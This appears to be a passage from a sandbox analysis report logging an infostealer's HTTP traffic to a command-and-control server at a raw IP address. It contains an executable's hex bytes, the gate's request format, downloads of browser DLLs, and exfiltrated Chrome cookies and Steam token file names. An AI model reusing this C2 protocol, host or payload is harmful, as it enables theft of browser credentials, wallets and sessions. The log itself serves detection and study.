Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 11:54:24 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 95.182.96.50Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBKFIEBGCAAFIEBFCAEHost: 95.182.96.50Content-Length: 215Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 49 45 42 47 43 41 41 46 49 45 42 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 43 35 41 30 41 43 32 38 37 30 35 32 34 35 38 35 30 34 38 39 33 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 49 45 42 47 43 41 41 46 49 45 42 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 69 6e 74 65 61 6d 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 49 45 42 47 43 41 41 46 49 45 42 46 43 41 45 2d 2d 0d 0a Data Ascii: ------GCBKFIEBGCAAFIEBFCAEContent-Disposition: form-data; name="hwid"0C5A0AC287052458504893------GCBKFIEBGCAAFIEBFCAEContent-Disposition: form-data; name="build"mainteam------GCBKFIEBGCAAFIEBFCAE--
Source: global traffic	HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJKKKJJJKJKFHJJJJECHost: 95.182.96.50Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 33 61 66 39 61 38 62 32 66 31 33 37 39 36 62 31 35 65 32 61 33 33 34 36 64 31 64 61 30 30 36 64 66 30 66 33 34 66 64 62 32 61 35 38 38 65 66 33 61 35 62 34 38 37 35 63 35 39 38 33 38 33 66 65 37 66 66 62 35 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 2d 2d 0d 0a Data Ascii: ------JKJKKKJJJKJKFHJJJJECContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------JKJKKKJJJKJKFHJJJJECContent-Disposition: form-data; name="message"browsers------JKJKKKJJJKJKFHJJJJEC--
Source: global traffic	HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDGDGDHDGDBFIDHDBAFHost: 95.182.96.50Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 33 61 66 39 61 38 62 32 66 31 33 37 39 36 62 31 35 65 32 61 33 33 34 36 64 31 64 61 30 30 36 64 66 30 66 33 34 66 64 62 32 61 35 38 38 65 66 33 61 35 62 34 38 37 35 63 35 39 38 33 38 33 66 65 37 66 66 62 35 63 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 46 2d 2d 0d 0a Data Ascii: ------KJDGDGDHDGDBFIDHDBAFContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------KJDGDGDHDGDBFIDHDBAFContent-Disposition: form-data; name="message"plugins------KJDGDGDHDGDBFIDHDBAF--
Source: global traffic	HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDBAKFCFHCGDGCBAAKFHost: 95.182.96.50Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 42 41 4b 46 43 46 48 43 47 44 47 43 42 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 33 61 66 39 61 38 62 32 66 31 33 37 39 36 62 31 35 65 32 61 33 33 34 36 64 31 64 61 30 30 36 64 66 30 66 33 34 66 64 62 32 61 35 38 38 65 66 33 61 35 62 34 38 37 35 63 35 39 38 33 38 33 66 65 37 66 66 62 35 63 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 42 41 4b 46 43 46 48 43 47 44 47 43 42 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 42 41 4b 46 43 46 48 43 47 44 47 43 42 41 41 4b 46 2d 2d 0d 0a Data Ascii: ------BGDBAKFCFHCGDGCBAAKFContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------BGDBAKFCFHCGDGCBAAKFContent-Disposition: form-data; name="message"fplugins------BGDBAKFCFHCGDGCBAAKF--
Source: global traffic	HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFIIIIJKFCAAECAKFIEHHost: 95.182.96.50Content-Length: 6679Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /fee3b98529eb4b43/sqlite3.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDAFIJJECFHJJKFCAKJHost: 95.182.96.50Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 44 41 46 49 4a 4a 45 43 46 48 4a 4a 4b 46 43 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 33 61 66 39 61 38 62 32 66 31 33 37 39 36 62 31 35 65 32 61 33 33 34 36 64 31 64 61 30 30 36 64 66 30 66 33 34 66 64 62 32 61 35 38 38 65 66 33 61 35 62 34 38 37 35 63 35 39 38 33 38 33 66 65 37 66 66 62 35 63 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 46 49 4a 4a 45 43 46 48 4a 4a 4b 46 43 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 46 49 4a 4a 45 43 46 48 4a 4a 4b 46 43 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 46 49 4a 4a 45 43 46 48 4a 4a 4b 46 43 41 4b 4a 2d 2d 0d 0a Data Ascii: ------EHDAFIJJECFHJJKFCAKJContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------EHDAFIJJECFHJJKFCAKJContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------EHDAFIJJECFHJJKFCAKJContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ
Source: global traffic	HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFCFBKKKFHCFHJKFIIEHHost: 95.182.96.50Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 43 46 42 4b 4b 4b 46 48 43 46 48 4a 4b 46 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 33 61 66 39 61 38 62 32 66 31 33 37 39 36 62 31 35 65 32 61 33 33 34 36 64 31 64 61 30 30 36 64 66 30 66 33 34 66 64 62 32 61 35 38 38 65 66 33 61 35 62 34 38 37 35 63 35 39 38 33 38 33 66 65 37 66 66 62 35 63 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 46 42 4b 4b 4b 46 48 43 46 48 4a 4b 46 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 46 42 4b 4b 4b 46 48 43 46 48 4a 4b 46 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 46 42 4b 4b 4b 46 48 43 46 48 4a 4b 46 49 49 45 48 2d 2d 0d 0a Data Ascii: ------BFCFBKKKFHCFHJKFIIEHContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------BFCFBKKKFHCFHJKFIIEHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BFCFBKKKFHCFHJKFIIEHContent-Disposition: form-data; name="file"------BFCFBKKKFHCFHJKFIIEH--
Source: global traffic	HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAAEBFHJJDAAKFIECGDHost: 95.182.96.50Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 33 61 66 39 61 38 62 32 66 31 33 37 39 36 62 31 35 65 32 61 33 33 34 36 64 31 64 61 30 30 36 64 66 30 66 33 34 66 64 62 32 61 35 38 38 65 66 33 61 35 62 34 38 37 35 63 35 39 38 33 38 33 66 65 37 66 66 62 35 63 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 2d 2d 0d 0a Data Ascii: ------FCAAEBFHJJDAAKFIECGDContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------FCAAEBFHJJDAAKFIECGDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FCAAEBFHJJDAAKFIECGDContent-Disposition: form-data; name="file"------FCAAEBFHJJDAAKFIECGD--
Source: global traffic	HTTP traffic detected: GET /fee3b98529eb4b43/freebl3.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /fee3b98529eb4b43/mozglue.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /fee3b98529eb4b43/msvcp140.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /fee3b98529eb4b43/nss3.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /fee3b98529eb4b43/softokn3.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /fee3b98529eb4b43/vcruntime140.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIDHIEGIIIECAKEBFBAHost: 95.182.96.50Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIEHDBGDHDAECBGDHJKFHost: 95.182.96.50Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 33 61 66 39 61 38 62 32 66 31 33 37 39 36 62 31 35 65 32 61 33 33 34 36 64 31 64 61 30 30 36 64 66 30 66 33 34 66 64 62 32 61 35 38 38 65 66 33 61 35 62 34 38 37 35 63 35 39 38 33 38 33 66 65 37 66 66 62 35 63 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 2d 2d 0d 0a Data Ascii: ------FIEHDBGDHDAECBGDHJKFContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------FIEHDBGDHDAECBGDHJKFContent-Disposition: form-data; name="message"wallets------FIEHDBGDHDAECBGDHJKF--
Source: global traffic	HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHIJJJEGDBFHDHJJDBAKHost: 95.182.96.50Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 49 4a 4a 4a 45 47 44 42 46 48 44 48 4a 4a 44 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 33 61 66 39 61 38 62 32 66 31 33 37 39 36 62 31 35 65 32 61 33 33 34 36 64 31 64 61 30 30 36 64 66 30 66 33 34 66 64 62 32 61 35 38 38 65 66 33 61 35 62 34 38 37 35 63 35 39 38 33 38 33 66 65 37 66 66 62 35 63 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 4a 4a 4a 45 47 44 42 46 48 44 48 4a 4a 44 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 4a 4a 4a 45 47 44 42 46 48 44 48 4a 4a 44 42 41 4b 2d 2d 0d 0a Data Ascii: ------GHIJJJEGDBFHDHJJDBAKContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------GHIJJJEGDBFHDHJJDBAKContent-Disposition: form-data; name="message"files------GHIJJJEGDBFHDHJJDBAK--
Source: global traffic	HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAKFCBFHJDHJKECAKEHHost: 95.182.96.50Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 33 61 66 39 61 38 62 32 66 31 33 37 39 36 62 31 35 65 32 61 33 33 34 36 64 31 64 61 30 30 36 64 66 30 66 33 34 66 64 62 32 61 35 38 38 65 66 33 61 35 62 34 38 37 35 63 35 39 38 33 38 33 66 65 37 66 66 62 35 63 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 2d 2d 0d 0a Data Ascii: ------CBAKFCBFHJDHJKECAKEHContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------CBAKFCBFHJDHJKECAKEHContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------CBAKFCBFHJDHJKECAKEHContent-Disposition: form-data; name="file"------CBAKFCBFHJDHJKECAKEH--
Source: global traffic	HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHDGIEHJJJJEBGDAFHJHost: 95.182.96.50Content-Length: 115363Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKECAEBGHDAEBFHIEGHIHost: 95.182.96.50Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 43 41 45 42 47 48 44 41 45 42 46 48 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 33 61 66 39 61 38 62 32 66 31 33 37 39 36 62 31 35 65 32 61 33 33 34 36 64 31 64 61 30 30 36 64 66 30 66 33 34 66 64 62 32 61 35 38 38 65 66 33 61 35 62 34 38 37 35 63 35 39 38 33 38 33 66 65 37 66 66 62 35 63 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 41 45 42 47 48 44 41 45 42 46 48 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 41 45 42 47 48 44 41 45 42 46 48 49 45 47 48 49 2d 2d 0d 0a Data Ascii: ------BKECAEBGHDAEBFHIEGHIContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------BKECAEBGHDAEBFHIEGHIContent-Disposition: form-data; 